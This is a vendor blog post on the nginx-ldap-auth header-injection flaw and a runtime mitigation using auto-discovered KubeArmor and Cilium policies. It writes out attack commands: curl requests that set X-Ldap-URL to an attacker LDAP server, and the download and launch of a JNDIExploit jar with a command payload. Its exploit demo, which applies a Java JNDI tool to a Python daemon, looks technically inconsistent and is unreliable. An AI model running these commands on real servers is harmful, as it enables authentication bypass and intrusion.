Introduction

A significant vulnerability in the nginx-ldap-auth software package was recently disclosed publicly, allowing attackers to bypass authentication and disclose sensitive information from affected servers. The issue is still under investigation, so this blog post may be updated as more information becomes available. The latest update is NGINX's response to the vulnerability in a blog post: Addressing Security Weaknesses in the NGINX LDAP Reference Implementation - NGINX

This weekend, information about the vulnerability was first made public on Twitter, and since then a GitHub repository has been set up to collect the details: NginxDay/README.md at main · AgainstTheWest/NginxDay

Starting from the publicly available information, the AccuKnox security team analyzed the issue, traced the source of the vulnerability, and devised a workaround using AccuKnox open source tools. Before we get into that, let us talk a bit about what Nginx and LDAP are.

NGINX and LDAP

Nginx (pronounced "engine X") is a web server that can also act as a reverse proxy, load balancer, mail proxy, and HTTP cache. NGINX was originally designed to serve static files, but it has evolved into a full-featured web server capable of handling a wide range of server responsibilities. NGINX has eclipsed Apache in popularity thanks to its small footprint and its ability to scale on low-cost hardware.

Lightweight Directory Access Protocol (LDAP) is a protocol that makes it possible for applications to query user information quickly. Companies store usernames, passwords, email addresses, printer connections, and other relatively static data in directories, and LDAP is an open, vendor-neutral protocol for accessing and storing such data. LDAP can also handle authentication, so users can log in once and access many different resources on the server.
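As an illustration, such a directory lookup can be made with the standard ldapsearch client; the server address, base DN, and user below are hypothetical:

```shell
# Query a (hypothetical) directory for a user's mail attribute.
# -x: simple authentication, -H: server URI, -b: search base
ldapsearch -x -H ldap://ldap.example.com \
  -b "dc=example,dc=com" "(uid=alice)" mail
```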

The Vulnerability

The NGINX LDAP reference implementation uses LDAP to authenticate users of applications served by NGINX. The reference implementation was announced in June 2015. The solution uses the ngx_http_auth_request_module module (auth_request) in NGINX and NGINX Plus, which forwards authentication requests to an external service. In this setup, that service is a daemon called nginx-ldap-auth. It is written in Python and communicates with an LDAP authentication server.

Source: NGINX

If the administrator relies on configuration passed to the nginx-ldap-auth daemon via command-line parameters, instead of pinning the corresponding headers with proxy_set_header directives in the Nginx configuration, then the system is in danger.
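As a sketch of the safer configuration, following NGINX's published mitigation guidance, the auth proxy location can explicitly set or blank the sensitive headers so that client-supplied values never reach the daemon. The upstream address, LDAP URL, and base DN below are placeholders; adapt them to your deployment:

```nginx
# In the location that proxies to nginx-ldap-auth, pin or blank the
# X-Ldap-* headers so attacker-supplied values are not passed through.
location = /auth-proxy {
    proxy_pass http://127.0.0.1:8888;
    proxy_set_header X-Ldap-URL      "ldap://internal-ldap:389";
    proxy_set_header X-Ldap-BaseDN   "dc=example,dc=com";
    proxy_set_header X-Ldap-Starttls "";
    proxy_set_header X-Ldap-Realm    "";
}
```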

An attacker can send an HTTP request with crafted X-Ldap-* headers, which Nginx forwards to the nginx-ldap-auth daemon; the daemon then uses them when talking to the LDAP server to determine whether the supplied credentials are valid.
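The root cause can be sketched in a few lines of Python. This is a simplified illustration of the flawed pattern, not the daemon's actual code; the default values are hypothetical, while the header names come from the reference implementation:

```python
# Simplified sketch: request headers silently override server-side
# defaults, so a client can redirect authentication to an LDAP
# server it controls.
DEFAULTS = {"url": "ldap://internal-ldap:389", "basedn": "dc=corp,dc=example"}

# Header names used by the nginx-ldap-auth reference implementation
HEADER_MAP = {"X-Ldap-URL": "url", "X-Ldap-BaseDN": "basedn"}

def effective_config(headers, defaults=DEFAULTS):
    """Return the LDAP settings the daemon would actually use."""
    cfg = dict(defaults)
    for header, key in HEADER_MAP.items():
        if header in headers:          # attacker-supplied header wins
            cfg[key] = headers[header]
    return cfg

# A crafted request redirects authentication to the attacker's server:
cfg = effective_config({"X-Ldap-URL": "ldap://malicious.url.com"})
```

The fix, correspondingly, is to ensure the proxy never forwards client-controlled values for these headers.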

The first attack (authentication bypass and information disclosure) involves supplying an X-Ldap-URL header that points to a malicious LDAP server. On publicly exposed servers, this attack can be carried out without any authentication. It causes the vulnerable system, via the nginx-ldap-auth daemon, to connect to the attacker-controlled LDAP server. If that server responds positively to every request, the attacker can authenticate as any user of the nginx-ldap-auth-protected application, and can also learn details the administrator configured for the legitimate LDAP server, such as the Base DN. Depending on the target server and the situation, this can lead to account takeover, disclosure of personal information, and further exploitation within the context of the compromised user.

The attack can be carried out using applications as simple as curl:

curl -H 'X-Ldap-URL: ldap://malicious.url.com' https://vulnerable-website 
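Other daemon settings can be overridden the same way. The additional header name below comes from the reference implementation; the URLs and base DN are placeholders:

```shell
curl -H 'X-Ldap-URL: ldap://malicious.url.com' \
     -H 'X-Ldap-BaseDN: dc=example,dc=com' \
     https://vulnerable-website
```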

Let us take an example and dig deeper into the vulnerability.

Setting up an Nginx app to demonstrate runtime security

We will demonstrate how to protect the Nginx application against such threats by implementing runtime security tools from AccuKnox. These will analyze the application and generate policies that can be enforced by Linux Security Modules (LSMs) like AppArmor and SELinux.

We’ll deploy a sample application to a Kubernetes environment, use AccuKnox open source tools to generate zero-trust runtime security policies, apply them to the workload, and compare the states before and after installing the AccuKnox agents.

The scenario's purpose is to demonstrate how AccuKnox open source tools can be used to prevent the “nginxday” zero-day vulnerability.

Let's create a Kubernetes cluster

gcloud container clusters create sample-cluster --zone us-central1-c 

We will deploy a simple application that serves on port 80 and shows the hostname when accessed.

Feel free to use the below deployment file to deploy the application to your k8s environment

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
  labels:
    app: nginx
spec:
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx18
          image: knoxuser/nginx18
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: nginx-svc
  name: nginx-svc
spec:
  ports:
    - name: "80"
      port: 80
      targetPort: 80
  selector:
    app: nginx
  type: LoadBalancer
Deployment file

You can also deploy the same file from accuknox/samples GitHub repository by copy-pasting the below command:

kubectl apply -f https://raw.githubusercontent.com/accuknox/samples/main/nginx-zeroday/k8s.yaml

This will create a deployment nginx and a service nginx-svc. Let us check whether the application is running and has an external IP.

kubectl get pod,svc

NAME                              READY   STATUS    RESTARTS   AGE
pod/nginx-7f67bc45dc-jscb6        1/1     Running   0          85s

NAME                     TYPE           CLUSTER-IP     EXTERNAL-IP   PORT(S)        AGE
service/kubernetes       ClusterIP      10.44.0.1      <none>        443/TCP        6h27m
service/nginx-svc        LoadBalancer   10.44.12.105   34.135.54.3   80:30318/TCP   85s
Deployment NGINX

We have our application running and exposed to the public internet via port 80 with IP 34.135.54.3.
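A quick sanity check against the external IP from the output above should return the pod's hostname:

```shell
# The sample app responds with the serving pod's hostname
curl -s http://34.135.54.3/
```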

For the complete code please refer to the accuknox/samples GitHub page

Runtime protection using AccuKnox Open-source tools

AccuKnox enables you to protect your workloads at runtime. It does this by allowing you to configure policies (or auto-discover them) for application and network behaviour using KubeArmor, Cilium, and the Auto Policy Discovery tools.

KubeArmor

KubeArmor is open-source software that enables you to protect your cloud workloads at runtime.

The problem KubeArmor solves is preventing cloud workloads from executing malicious activity at runtime. Malicious activity is any activity that the workload was not designed for or is not supposed to perform.

Cilium

Cilium is an open-source project that provides eBPF-based networking, security, and observability for cloud-native environments such as Kubernetes clusters and other container orchestration platforms.

Auto Policy Discovery for your Nginx Application

Even though writing KubeArmor and Cilium (system and network) policies is not a big challenge, AccuKnox open source simplifies it one step further with a new CLI tool for auto-discovered policies. The Auto-Discovery module helps users by observing the application's flows and generating policies based on them.

Discovering policies has never been easier: with two simple commands, you can set up the tooling and generate policies without any trouble.

We will use AccuKnox Auto Discovered Policies to generate zero-trust runtime security policies to secure our workload.

The auto-discovered zero-trust runtime security policies can be generated using two commands. We will deploy Cilium and KubeArmor to the cluster and use a MySQL pod to store the discovered policies, from where they can be downloaded with a single command.

First, we will use the below command to install all prerequisites.

curl -s https://raw.githubusercontent.com/accuknox/tools/main/install.sh | bash

Once the command is run successfully it will install the following components to your cluster:

  • KubeArmor protection engine
  • Cilium CNI
  • Auto policy discovery engine
  • MySQL database to keep discovered policies
  • Hubble Relay and KubeArmor Relay

Once this is done, we can invoke the second script, which will download the auto-discovered policies from the MySQL database and store them locally. For this we will issue the below command:

curl -s https://raw.githubusercontent.com/accuknox/tools/main/get_discovered_yamls.sh | bash

You should be able to see the following output.

{
  "res": "ok"
}
Got 59 cilium policies in file cilium_policies.yaml
{
  "res": "ok"
}
Got 1 kubearmor policies in file kubearmor_policies_default_default_nginx_bycnubnu.yaml
Got 1 kubearmor policies in file kubearmor_policies_default_explorer_knoxautopolicy_iwakqnyr.yaml
Got 1 kubearmor policies in file kubearmor_policies_default_explorer_mysql_zvbbfzqy.yaml
Command

Within seconds of running the auto policy discovery tool, it generated 59 Cilium policies and 3 curated KubeArmor policies.

Let us take a look at some of the auto-discovered policies.

Cilium Policy #1

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: autopol-egress-gyipqtvnnrwyzmg
  namespace: default
spec:
  endpointSelector:
    matchLabels:
      app: nginx
  egress:
  - toEndpoints:
    - matchLabels:
        k8s-app: kube-dns
        k8s:io.kubernetes.pod.namespace: kube-system
    toPorts:
    - ports:
      - port: "53"
        protocol: UDP
Cilium policy 1

Cilium Policy #2

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: autopol-egress-uhqpnyxadmphepg
  namespace: default
spec:
  endpointSelector:
    matchLabels:
      app: nginx
  egress:
  - toPorts:
    - ports:
      - port: "443"
        protocol: TCP
      - port: "80"
        protocol: TCP
Cilium policy 2

From Policy #1 and #2, we can see that the Nginx pod only communicates externally via ports 53, 80, and 443, and that port 53 is used to talk to kube-dns only.

If we apply these policies, only the necessary communication via ports 53, 80, and 443 will be allowed, thereby lowering the chances of any network-based attack or unexpected communication from the Nginx pod to the external world.
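One way to spot-check the egress restriction (assuming a curl binary is available in the container image) is to try a non-allowlisted port from inside the pod; with the policies applied, the connection should time out:

```shell
# Port 1389 is not in the egress allowlist, so this should be dropped
kubectl exec deploy/nginx -- curl -sS --max-time 5 http://example.com:1389/
```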

KubeArmor Policy #1

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: autopol-default-nginx
  namespace: default
spec:
  severity: 1
  selector:
    matchLabels:
      app: nginx
  process:
    matchPaths:
    - path: /bin/bash
    - path: /bin/cat
      fromSource:
      - path: /etc/init.d/procps
----------------------snip---------------------
    matchDirectories:
    - dir: /bin/
      fromSource:
      - path: /bin/sh
  file:
    matchPaths:
    - path: /bin/egrep
      fromSource:
      - path: /bin/grep
      - path: /usr/sbin/grep
----------------------snip---------------------
    matchDirectories:
    - dir: /
      fromSource:
      - path: /bin/bash
----------------------snip---------------------
    - dir: /usr/src/app/node_modules/
      fromSource:
      - path: /usr/local/bin/node
  network:
    matchProtocols:
    - protocol: raw
      fromSource:
      - path: /usr/bin/curl
----------------------snip---------------------
    - protocol: udp
      fromSource:
      - path: /usr/bin/curl
  action: Allow
---
KubeArmor Policy 1

The curated KubeArmor policy is a lengthy one that allows all the operations observed in a healthy environment, thereby denying any other operations triggered by external factors.
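Because the policy's action is Allow, anything outside the discovered behavior is denied. A quick hypothetical check from inside the pod (the binary path is illustrative and depends on the image):

```shell
# Executing a binary that was never observed during discovery
# should be blocked by KubeArmor's allowlist policy
kubectl exec -it deploy/nginx -- /usr/bin/apt-get update
```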

Let us apply all these auto-generated policies and safeguard our workload.

ls -la | awk '{print $9}'
.
..
cilium_policies.yaml
kubearmor_policies_default_default_nginx_bycnubnu.yaml
kubearmor_policies_default_explorer_knoxautopolicy_iwakqnyr.yaml
kubearmor_policies_default_explorer_mysql_zvbbfzqy.yaml
Auto discovered policies

We will apply cilium_policies.yaml and kubearmor_policies_default_default_nginx_bycnubnu.yaml, since both relate to the nginx application deployed in the default namespace.

kubectl apply -f cilium_policies.yaml -f kubearmor_policies_default_default_nginx_bycnubnu.yaml

ciliumnetworkpolicy.cilium.io/autopol-egress-gyipqtvnnrwyzmg created
ciliumnetworkpolicy.cilium.io/autopol-egress-uhqpnyxadmphepg created
kubearmorpolicy.security.kubearmor.com/autopol-default-nginx created
Apply policy

The Policies in action

It is time to verify whether we were able to achieve zero trust by using the auto-discovered policies generated by AccuKnox open source tools. To test this we will scan the application with some popular scanners.

Before that, let us verify that the policies are applied correctly to the cluster:

kubectl get cnp,ksp -A

NAMESPACE   NAME                                                           AGE
default     ciliumnetworkpolicy.cilium.io/autopol-egress-gyipqtvnnrwyzmg   26m
default     ciliumnetworkpolicy.cilium.io/autopol-egress-uhqpnyxadmphepg   25m

NAMESPACE   NAME                                                                AGE
default     kubearmorpolicy.security.kubearmor.com/autopol-default-nginx        14m
Applied Policies

Initiating the Attack scenario

The first step is to create a malicious LDAP server, to do that please follow these steps.

  1. Download the malicious LDAP server:

wget https://log4j-knox.s3.amazonaws.com/JNDIExploit-1.2-SNAPSHOT.jar

  2. Start the LDAP server to listen for incoming traffic on your PC or cloud VM:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <your-public-ip>

We will initiate the attack by sending crafted requests to the application. Go to the application IP, supply the query ldap://152.70.67.139:1389/Basic/Command/hostname, and watch the response received.

The complete request would look something like this:

curl -H 'X-Ldap-URL: ldap://152.70.67.139:1389/Basic/Command/hostname' 35.239.3.12

^c

The auto-discovered policies applied earlier prevent the pod from communicating over any other port, i.e., port 1389.
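To confirm the packets are being dropped by Cilium rather than failing for some other reason, you can watch drop events from a Cilium agent (the DaemonSet name below assumes a standard Cilium install):

```shell
# Stream packet-drop events observed by the Cilium agent
kubectl -n kube-system exec ds/cilium -- cilium monitor --type drop
```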

We will delete the KubeArmor and Cilium policies, rerun the exploit, and compare the state.

kubectl delete cnp --all    
   
ciliumnetworkpolicy.cilium.io "autopol-egress-gyipqtvnnrwyzmg" deleted
ciliumnetworkpolicy.cilium.io "autopol-egress-uhqpnyxadmphepg" deleted

kubectl delete ksp --all 

kubearmorpolicy.security.kubearmor.com "autopol-default-nginx" deleted
KubeArmor and Cilium policies

We will again go to the application IP and give the query ldap://152.70.67.139:1389/Basic/Command/hostname and watch the response received.

curl -H 'X-Ldap-URL: ldap://152.70.67.139:1389/Basic/Command/hostname' 35.239.3.12

     javaClassName: foo 
     
     javaCodeBase: http://152.70.67.139:8080/ 
     
     objectClass: javaNamingReference 
     
     javaFactory: ExploitPDGjf0XUe6 

^c 
Exploit

We can see that the attack succeeded after we deleted the policies that were auto-discovered in a safe environment. This means applying the auto-discovered policies ensured that “nginxday” was mitigated at runtime.

AccuKnox's policy templates repository

AccuKnox's policy-templates is an open-source repo that contains a wide range of attack prevention techniques, including MITRE-mapped ones, as well as hardening policies for your workloads. Please visit GitHub - kubearmor/policy-templates to download and apply policy templates.

Conclusion

Even though zero-day exploits are harder to avoid and protect against, with AccuKnox open source tools you can protect your workloads from possible threats and vulnerabilities until a permanent fix is available from the vendor.

Using AccuKnox open-source tools, an organization can effectively protect against accidental developer-introduced vulnerabilities and zero-day vulnerabilities alike, without downtime or risky half-baked patches.